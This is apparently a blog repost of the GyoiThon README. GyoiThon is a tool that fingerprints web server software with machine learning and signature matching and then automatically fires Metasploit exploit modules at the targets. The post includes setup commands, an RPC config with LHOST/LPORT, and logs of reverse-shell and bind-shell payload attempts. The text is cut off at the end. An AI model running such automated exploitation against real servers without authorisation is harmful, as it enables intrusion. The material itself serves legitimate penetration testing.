{"id":248,"date":"2022-10-04T06:40:12","date_gmt":"2022-10-04T06:40:12","guid":{"rendered":"https:\/\/sajinshivdas.com\/cybersecurity\/?p=248"},"modified":"2024-08-13T10:21:31","modified_gmt":"2024-08-13T10:21:31","slug":"gyoithon-next-generation-penetration-testing-tool-using-machine-learning","status":"publish","type":"post","link":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/","title":{"rendered":"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning"},"content":{"rendered":"\n<p>GyoiThon execute&nbsp;<strong>remote access<\/strong>&nbsp;to target Web server and&nbsp;<strong>identifies product operated on the server<\/strong>&nbsp;such as CMS, Web server software, Framework, Programming Language etc,. And, it can&nbsp;<strong>execute exploit modules<\/strong>&nbsp;to identified products using Metasploit. GyoiThon&nbsp;<strong>fully automatically execute<\/strong>&nbsp;above action.<\/p>\n\n\n\n<p>GyoiThon&#8217;s main features are following.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Remote access\/Fully automatic<br>GyoiThon can&nbsp;<strong>fully automatically<\/strong>&nbsp;gather the information of target Web server using only&nbsp;<strong>remote access<\/strong>. You only execute GyoiThon once for your operation.<\/li>\n\n\n\n<li>Non-destructive test<br>GyoiThon can gather information of target Web server using&nbsp;<strong>only normally access<\/strong>.<br>But, when you use a part of option, GyoiThon execute abnormally access such as sending exploit modules.<\/li>\n\n\n\n<li>Gathering various information<br>GyoiThon has various intelligence gathering engines such as Web crawler, Google Custom Search API, Censys, explorer of default contents, examination of cloud services etc,. By analyze gathered information using&nbsp;<strong>strings pattern matching<\/strong>&nbsp;and&nbsp;<strong>machine learning<\/strong>, GyoiThon can identify&nbsp;<strong>product\/version\/CVE number<\/strong>&nbsp;operated on the target web server,&nbsp;<strong>unnecceary html comments<\/strong>\/<strong>debug messages<\/strong>,&nbsp;<strong>login page<\/strong>&nbsp;etc,.<\/li>\n\n\n\n<li>Examination of real vulnerability<br>GyoiThon can execute exploit modules to identified products using Metasploit.<br>As a result, it can&nbsp;<strong>examine real vulnerability of target web server<\/strong>.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/Detail01-1024x437.png\" alt=\"\" class=\"wp-image-250\"\/><figcaption class=\"wp-element-caption\"><strong>Examine real vulnerability of target web server<\/strong>.<\/figcaption><\/figure>\n\n\n\n<p><strong><em>Note:<\/em><\/strong><\/p>\n\n\n\n<p><em>If you are interested,&nbsp;please use them in an environment under your control and at your own risk.<\/em><\/p>\n\n\n\n<p><strong>Processing Steps<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/Detail02.png\" alt=\"\" class=\"wp-image-251\"\/><\/figure>\n\n\n\n<p>GyoiThon executes the above &#8220;Step1&#8221; &#8211; &#8220;Step4&#8221; fully automatically.<br><strong>User&#8217;s only operation is to input the top URL<\/strong>&nbsp;of the target web server in GyoiThon.<br><br>It is very easy!<br>You can identify vulnerabilities of the web servers without taking time and effort.<\/p>\n\n\n\n<p><strong>Processing flow<\/strong><\/p>\n\n\n\n<p><strong>Step 1.<\/strong>&nbsp;Gather HTTP responses.<br>GyoiThon gathers several HTTP responses of target website while crawling.<br>The following are example of HTTP responses gathered by GyoiThon.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Example 1<\/strong><\/li>\n<\/ul>\n\n\n\n<p>HTTP\/1.1 200 OK<br>Date: Tue, 06 Mar 2018 03:01:57 GMT<br>Connection: close<br>Content-Type: text\/html; charset=UTF-8<br>Etag: &#8220;409ed-183-53c5f732641c0&#8221;<br>Content-Length: 15271<br><br>&#8230;snip&#8230;<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Example 2<\/strong><\/li>\n<\/ul>\n\n\n\n<p>HTTP\/1.1 200 OK<br>Date: Tue, 06 Mar 2018 06:56:17 GMT<br>Connection: close<br>Content-Type: text\/html; charset=UTF-8<br>Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;<br>path=\/;<br>Content-Length: 37496<br><br>&#8230;snip&#8230;<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Example.3<\/strong><\/li>\n<\/ul>\n\n\n\n<p>HTTP\/1.1 200 OK<br>Date: Tue, 06 Mar 2018 04:19:19 GMT<br>Connection: close<br>Content-Type: text\/html; charset=UTF-8<br>Content-Length: 11819<br><br>&#8230;snip&#8230;<br><br>&nbsp;&lt;script src=&#8221;\/core\/misc\/drupal.js?v=8.3.1&#8243;&gt;&lt;\/script&gt;<br><br><\/p>\n\n\n\n<p><strong>Step 2. Identify product name.<\/strong><\/p>\n\n\n\n<p>GyoiThon identifies product name installed on web server using following two methods.<br><br><strong>1. Based on Machine Learning.<\/strong><br>By using Machine Learning (Naive Bayes), GyoiThon identifies software based on a&nbsp;<strong>combination of slightly different features<\/strong>&nbsp;(Etag value, Cookie value, specific HTML tag etc.) for each software. Naive Bayes is learned using the training data which example below (Training data). Unlike the signature base, Naive Bayes is stochastically identified based on various features included in HTTP response when it cannot be identified software in one feature.<br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Example 1<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Etag: &#8220;409ed-183-53c5f732641c0&#8221;<br><br>GyoiThon can identify the web server software&nbsp;<strong>Apache<\/strong>.<br>This is because GyoiThon learns features of Apache such as&nbsp;<strong>&#8220;Etag header value<\/strong>&nbsp;(409ed-183-53c5f732641c0). In our survey, Apache use combination of numeral and lower case letters as the Etag value. And, Etag value is&nbsp;<strong>separated 4-5 digits and 3-4 digits and 12 digits, final digit is 0&nbsp;<\/strong>in many cases.<br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Example 2<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;<br><br>GyoiThon can identify the CMS&nbsp;<strong>Joomla!<\/strong>.<br>This is because GyoiThon learns features of Joomla! such as &#8220;<strong>Cookie name<\/strong>&nbsp;(f00e6 &#8230; 9831e) &#8221; and &#8220;<strong>Cookie value<\/strong>&nbsp;(0eba9 &#8230; 7f587). In our survey, Joomla! uses 32 lower case letters as the Cookie name and Cookie value in many cases.<br><br><\/p>\n\n\n\n<p><strong>Training data (One example)<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Joomla! (CMS)<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Set-Cookie: ([a-z0-9]{32})=[a-z0-9]{26,32};<br>Set-Cookie: [a-z0-9]{32}=([a-z0-9]{26,32});<br>&#8230;snip&#8230;<br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>HeartCore (Japanese famous CMS)<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Set-Cookie:.*=([A-Z0-9]{32});.*<br>&lt;meta name=[&#8220;&#8216;](author)[&#8220;&#8216;] content=[&#8220;&#8216;]{2}.*<br>&#8230;snip&#8230;<br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Apache (Web server software)<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Etag:.*&#8221;.*-[0-9a-z]{3,4}-[0-9a-z]{13}&#8221;)[\\r\\n]<br>&#8230;snip&#8230;<br><br><strong>2. Based on String matching.<\/strong><br>Of course, GyoiThon can identify software by string matching also used in traditional penetration test tools. Examples are shown below.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Example 3<\/strong><\/li>\n<\/ul>\n\n\n\n<p>&lt;script src=&#8221;\/core\/misc\/drupal.js?v=8.3.1&#8243;&gt;&lt;\/script&gt;<br><br>GyoiThon can identify the CMS Drupal.<br>It is very easy.<br><br><strong>Step 3. Exploit using Metasploit.<\/strong><br>GyoiThon executes exploit corresponding to the identified software using Metasploit and it checks whether the software is affected by the vulnerability.<br><br><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/Detail03.png\" alt=\"\" class=\"wp-image-252\"\/><figcaption class=\"wp-element-caption\"><strong>Exploit using Metasploit.<\/strong><\/figcaption><\/figure>\n\n\n\n<p><strong>Running example<\/strong><br>[*] exploit\/multi\/http\/struts_code_exec_exception_delegator, target: 1, payload: linux\/x86\/shell\/reverse_nonx_tcp, result: failure<br>[*] exploit\/multi\/http\/struts_code_exec_exception_delegator, target: 1, payload: linux\/x86\/shell\/reverse_tcp, result: failure<\/p>\n\n\n\n<p><br>[*] exploit\/multi\/http\/struts_code_exec_exception_delegator, target: 1, payload: linux\/x86\/shell\/reverse_tcp_uuid, result: failure<br>[*] exploit\/multi\/http\/struts_code_exec_exception_delegator, target: 1, payload: linux\/x86\/shell_bind_ipv6_tcp, result: failure<br>[*] exploit\/multi\/http\/struts_code_exec_exception_delegator, target: 1, payload: linux\/x86\/shell_bind_tcp, result: failure<br><br>&#8230;snip&#8230;<br><br>[*] exploit\/linux\/http\/apache_continuum_cmd_exec, target: 0, payload: generic\/custom, result: failure<br>[*] exploit\/linux\/http\/apache_continuum_cmd_exec, target: 0, payload: generic\/debug_trap, result: failure<br>[*] exploit\/linux\/http\/apache_continuum_cmd_exec, target: 0, payload: generic\/shell_bind_tcp, result: failure<br>[*] exploit\/linux\/http\/apache_continuum_cmd_exec, target: 0, payload: generic\/shell_reverse_tcp, result: failure<\/p>\n\n\n\n[*] exploit\/linux\/http\/apache_continuum_cmd_exec, target: 0, payload: generic\/tight_loop, result: bingo!!<br><br><strong>Step 4. Generate scan report.<\/strong><br>GyoiThon generates a report that summarizes vulnerabilities.<br>Report&#8217;s style is html.<br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Sample gyoithon_report<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/Detail04.png\" alt=\"\" class=\"wp-image-253\"\/><figcaption class=\"wp-element-caption\">Gyoithon_Sample_report<\/figcaption><\/figure>\n\n\n\n<p>&nbsp;<\/p>\n\n\n\n<p><strong>GyoiThon Demo.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"GyoiThon demo\" width=\"1080\" height=\"608\" src=\"https:\/\/www.youtube.com\/embed\/jmi43eZOE9w?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Installation<\/h3>\n\n\n\n<p><br><strong>Step 1. git clone GyoiThon&#8217;s repository.<\/strong><\/p>\n\n\n\n<p><br>local@client:~$ git clone https:\/\/github.com\/gyoisamurai\/GyoiThon.git<br><br><strong>Step 2. install required packages.<\/strong><\/p>\n\n\n\n<p><br>local@client:~$ cd GyoiThon<br>local@client:~$ pip install -r requirements.txt<br><br><br><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Usage<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Step 1. Initialize Metasploit DB<\/strong><\/li>\n<\/ul>\n\n\n\n<p><br>Firstly, you initialize metasploit db (postgreSQL) using msfdb command.<br><br>root@kali:~# msfdb init<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Step 2. Launch Metasploit Framework<\/strong><\/li>\n<\/ul>\n\n\n\n<p><br>You launch Metasploit on the remote server that installed Metasploit Framework such as Kali Linux.<br><br>root@kali:~# msfconsole<br>______________________________________________________________________________<br>|&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; |<br>|&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;METASPLOIT CYBER MISSILE COMMAND V4&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; |<br>|______________________________________________________________________________|<br>&nbsp; &nbsp; &nbsp;\\\\&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/<br>&nbsp; &nbsp; &nbsp; \\\\&nbsp; &nbsp; &nbsp;.&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; x<br>&nbsp; &nbsp; &nbsp; &nbsp;\\\\&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/<br>&nbsp; &nbsp; &nbsp; &nbsp; \\\\&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\\\\&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; .&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/<br>&nbsp; &nbsp;X&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; X<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;###<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# % #<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \/&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;###<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;.&nbsp; &nbsp; &nbsp; &nbsp;\/<br>&nbsp; &nbsp; .&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/&nbsp; &nbsp; &nbsp; .&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;.<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*<br><br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ^<br>####&nbsp; &nbsp; &nbsp; __&nbsp; &nbsp; &nbsp;__&nbsp; &nbsp; &nbsp;__&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; #######&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;__&nbsp; &nbsp; &nbsp;__&nbsp; &nbsp; &nbsp;__&nbsp; &nbsp; &nbsp; &nbsp; ####<br>####&nbsp; &nbsp; \/&nbsp; &nbsp; \\\\ \/&nbsp; &nbsp; \\\\ \/&nbsp; &nbsp; \\\\&nbsp; &nbsp; &nbsp; ###########&nbsp; &nbsp; &nbsp;\/&nbsp; &nbsp; \\\\ \/&nbsp; &nbsp; \\\\ \/&nbsp; &nbsp; \\\\&nbsp; &nbsp; &nbsp; ####<br>################################################################################<br>################################################################################<br># WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #<br>################################################################################<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; https:\/\/metasploit.com<br><br><br>&nbsp; &nbsp; &nbsp; =[ metasploit v4.16.15-dev&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;]<br>+ &#8212; &#8211;=[ 1699 exploits &#8211; 968 auxiliary &#8211; 299 post&nbsp; &nbsp; &nbsp; &nbsp; ]<br>+ &#8212; &#8211;=[ 503 payloads &#8211; 40 encoders &#8211; 10 nops&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ]<br>+ &#8212; &#8211;=[ Free Metasploit Pro trial: http:\/\/r-7.co\/trymsp ]<br><br>msf &gt;<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Step 3 Launch RPC Server<\/strong><\/li>\n<\/ul>\n\n\n\n<p><br>You launch RPC Server of Metasploit following.<br><br>msf&gt; load msgrpc ServerHost=192.168.220.144 ServerPort=55553 User=test Pass=test1234<br>[*] MSGRPC Service: 192.168.220.144:55553<br>[*] MSGRPC Username: test<br>[*] MSGRPC Password: test1234<br>[*] Successfully loaded plugin: msgrpc<br><br><strong>msgrpc options<\/strong> <strong>description<\/strong><br><strong>ServerHost &gt;<\/strong> IP address of your server that launched Metasploit. Above example is 192.168.220.144.<br><strong>ServerPort &gt;<\/strong> Any port number of your server that launched Metasploit. Above example is 55553.<br><strong>User &gt;<\/strong> Any user name using authentication (default =&gt; msf). Above example is test.<br>Pass Any password using authentication (default =&gt; random string). Above example is test1234.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Step 4&nbsp; &nbsp; &nbsp; Edit config file.<\/strong><\/li>\n<\/ul>\n\n\n\n<p><br>You have to change following value in&nbsp;<a href=\"https:\/\/github.com\/gyoisamurai\/GyoiThon\/blob\/master\/classifier4gyoithon\/config.ini\" target=\"_blank\" rel=\"noreferrer noopener\">config.ini<\/a><br>&#8230;snip&#8230;<br><br>[GyoiExploit]<br>server_host&nbsp; &nbsp; &nbsp; : 192.168.220.144<br>server_port&nbsp; &nbsp; &nbsp; : 55553<br>msgrpc_user&nbsp; &nbsp; &nbsp; : test<br>msgrpc_pass&nbsp; &nbsp; &nbsp; : test1234<br>timeout&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : 10<br>LHOST&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : 192.168.220.144<br>LPORT&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : 4444<br><br>&#8230;snip&#8230;<br><br><strong>Config Description<\/strong><br>server_host IP address of your server that launched Metasploit. Your setting value ServerHost in Step2.<br>server_port Any port number of your server that launched Metasploit. Your setting value ServerPort in Step2.<br>msgrpc_user Metasploit&#8217;s user name using authentication. Your setting value User in Step2.<br>msgrpc_pass Metasploit&#8217;s password using authentication. Your setting value Pass in Step2.<br>LHOST IP address of your server that launched Metasploit. Your setting value ServerHost in Step2.<br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Step 5 Edit target file.<\/strong><\/li>\n<\/ul>\n\n\n\n<p><br>GyoiThon accesses target server using&nbsp;host.txt<br>So, you have to edit host.txt before executing GyoiThon.<br><br>sample of host.txt<br>target server =&gt; 192.168.220.148<br>target port =&gt; 80<br>target path =&gt; \/oscommerce\/catalog\/<br>192.168.220.148 80 \/oscommerce\/catalog\/<br><br>You have to separate IP address, port number and target path using single space.<br><br><strong>Note<\/strong><br>Current gyoithon.py is provisional version that without crawling function. We&#8217;ll add crawling functionality to GyoiThon coming soon. Then, target path will be unnecessary.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Step 6 Run GyoiThon<\/strong><\/li>\n<\/ul>\n\n\n\n<p><br>You execute GyoiThon following command.<br>local@client:~$ python gyoithon.py<br><br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Step 7 Check scan report<\/strong><\/li>\n<\/ul>\n\n\n\n<p><br>Please check scan report using any web browser.<br><br>local@client:~$ firefox &#8220;gyoithon root path&#8221;\/classifier4gyoithon\/report\/gyoithon_report.html<br><br><br><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Tips<\/h3>\n\n\n\n<p><strong>1. How to add string matching patterns.<\/strong><br>signatures path includes four files corresponding to each product categories.<br><br>local@client:~$ ls &#8220;gyoithon root path&#8221;\/signatures\/<br>signature_cms.txt<br>signature_framework.txt<br>signature_os.txt<br>signature_web.txt<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>signature_cms.txt<\/li>\n<\/ul>\n\n\n\n<p><br>It includes string matching patterns of CMS.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>signature_framework.txt<\/li>\n<\/ul>\n\n\n\n<p><br>It includes string matching patterns of FrameWork.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>signature_os.txt<\/li>\n<\/ul>\n\n\n\n<p><br>It includes string matching patterns of Operating System.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>signature_web.txt<\/li>\n<\/ul>\n\n\n\n<p><br>It includes string matching patterns of Web server software.<br><br>If you want to add new string matching patterns, you add new string matching patterns at last line in each file.<br><br>ex) How to add new string matching pattern of CMS at&nbsp;signature_cms.txt.<br><br>tikiwiki@(Powered by TikiWiki)<br>wordpress@&lt;.*=(.*\/wp-).*\/.*&gt;<br>wordpress@(&lt;meta name=&#8221;generator&#8221; content=&#8221;WordPress).*&gt;<br><br>&#8230;snip&#8230;<br><br>typo@.*(href=&#8221;fileadmin\/templates\/).*&gt;<br>typo@(&lt;meta name=&#8221;generator&#8221; content=&#8221;TYPO3 CMS).*&gt;<br>&#8220;new product name&#8221;@&#8221;regex pattern&#8221;<br>[EOF]<br><br><strong><em>Note<\/em><\/strong><br><em>Above new product name must be a name that Metasploit can identify. And you have to separate new product name and regex pattern using @.<\/em><br><br><strong>2. How to add learning data.<\/strong><br>signatures path includes four files corresponding to each product categories.<br><br>local@client:~$ ls &#8220;gyoithon root path&#8221;\/classifier4gyoithon\/train_data\/<br>train_cms_in.txt<br>train_framework_in.txt<br>train_os_in.txt<br>train_web_in.txt<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>train_cms_in.txt<\/li>\n<\/ul>\n\n\n\n<p><br>It includes learning data of CMS.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>train_framework_in.txt<\/li>\n<\/ul>\n\n\n\n<p><br>It includes learning data of FrameWork.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>train_os_in.txt<\/li>\n<\/ul>\n\n\n\n<p><br>It includes learning data of Operating System.<br><br><br><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>train_web_in.txt<\/li>\n<\/ul>\n\n\n\n<p><br>It includes learning data of Web server software.<br><br>If you want to add new learning data, you add learning data at last line in each file.<br><br>ex) How to add new learning data of CMS at&nbsp;train_cms_in.txt.<\/p>\n\n\n\n<p><br><br>joomla@(Set-Cookie: [a-z0-9]{32}=.*);<br>joomla@(Set-Cookie: .*=[a-z0-9]{26,32});<br><br>&#8230;snip&#8230;<br><br>xoops@(xoops\\.js)<br>xoops@(xoops\\.css)<br>&#8220;new product name&#8221;@&#8221;regex pattern&#8221;<br>[EOF]<br><strong><br><em>Note<\/em><\/strong><br><em>Above new product name must be a name that Metasploit can identify. And you have to separate new product name and regex pattern using @.<\/em><br>In addition, since GyoiThon retrains with new training data, you have to delete old training data&nbsp;(*.pkl).<br><br>local@client:~$ ls &#8220;gyoithon root path&#8221;\/classifier4gyoithon\/trained_data\/<br>train_cms_out.pkl<br>train_framework_out.pkl<br>train_web_out.pkl<br>local@client:~$ rm &#8220;gyoithon root path&#8221;\/classifier4gyoithon\/trained_data\/*.pkl<br><br><strong>3. How to change &#8220;Exploit module&#8217;s option&#8221;.<\/strong><br>When GyoiThon exploits, it uses default value of Exploit module options.<br>If you want to change option values, please input any value to &#8220;user_specify&#8221; in exploit_tree.json as following.<br><br>&#8220;unix\/webapp\/joomla_media_upload_exec&#8221;: {<br>&nbsp; &nbsp; &#8220;targets&#8221;: {<br>&nbsp; &nbsp; &nbsp; &nbsp; &#8220;0&#8221;: [<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;generic\/custom&#8221;,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;generic\/shell_bind_tcp&#8221;,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;generic\/shell_reverse_tcp&#8221;,<br><br>&#8230;snip&#8230;<br><br>&nbsp; &nbsp; &nbsp; &nbsp; &#8220;TARGETURI&#8221;: {<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;type&#8221;: &#8220;string&#8221;,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;required&#8221;: true,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;advanced&#8221;: false,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;evasion&#8221;: false,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;desc&#8221;: &#8220;The base path to Joomla&#8221;,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;default&#8221;: &#8220;\/joomla&#8221;,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8220;user_specify&#8221;: &#8220;\/my_original_dir\/&#8221;<br>&nbsp; &nbsp; &nbsp; &nbsp; },<br><br>Above example is to change value of&nbsp;TARGETURI&nbsp;option in exploit module&nbsp;&#8220;exploit\/unix\/webapp\/joomla_media_upload_exec&#8221;&nbsp;to&nbsp;&#8220;\/my_original_dir\/&#8221;&nbsp;from&nbsp;&#8220;\/joomla&#8221;.<br><br><strong>4. How to use each instance.<\/strong><br>GyoiClassifier.py<br><br>You can use the 